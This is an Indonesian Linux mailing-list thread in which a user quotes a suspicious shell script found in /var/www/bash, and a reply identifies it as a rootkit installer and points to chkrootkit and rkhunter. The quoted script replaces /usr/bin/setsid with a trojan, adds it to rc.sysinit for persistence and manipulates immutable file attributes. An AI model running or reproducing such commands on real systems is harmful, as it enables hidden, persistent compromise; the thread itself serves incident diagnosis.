> halo, > > saya heran di linux saya ada folder /var/www/bash. disitu ada beberapa > executable, dan ada file script namanya id, isinya: > > ------------------------ > #!/bin/sh > echo " *** Welcome Kid *** " > mkdir -p /var/www/bash ; mv /tmp/x /var/www/bash > chattr -iau /sbin/init ; mv -f /sbin/init /sbin/hidden > cd /var/www/bash/x ; ./inst >/dev/null 2&>1 > sleep 2 > cd /var/www/bash ; ./sk >/dev/null > chattr -iau /sbin/init > rm -rf /sbin/init ; mv -f /sbin/hidden /sbin/init > echo " *** adding files for reboot ... *** " > chattr -iau /usr/bin/setsid ; rm -rf /usr/bin/setsid > sleep 2 > chattr -iau /var/www/bash/sk ; chattr -iau /etc/rc.d/rc.sysinit > cp /var/www/bash/sk /usr/bin/setsid > echo "/usr/bin/setsid >/dev/null 2&>1" >> /etc/rc.d/rc.sysinit > chattr +iau /etc/rc.d/rc.sysinit ; echo "ftp" >> /etc/ftpusers > echo "anonymous" >> /etc/ftpusers > echo " Job with Sk = DONE " > rm -rf /tmp/x gud.tgz ; cd /var/www/bash ; mkdir ah ; mv /tmp/x ah > --------------- > > ini file apaan ya ?
++ Hati-hati kayaknya ada yg coba pasang rootkit tuh ... seringkali kalo udah berhasil dia ninggal backdoor juga, cek linux anda pakai : chkrootkit http://www.chkrootkit.org/ , dan rootkit hunter http://www.rootkit.nl/ moga belum parah salam, -rianu- -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip, FAQ, dan info milis di http://linux.or.id/milis.php Tidak bisa posting? Baca: http://linux.or.id/wiki/index.php?pagename=ProblemMilisDanSolusi http://linux.or.id/wiki/index.php?pagename=TataTertibMilis
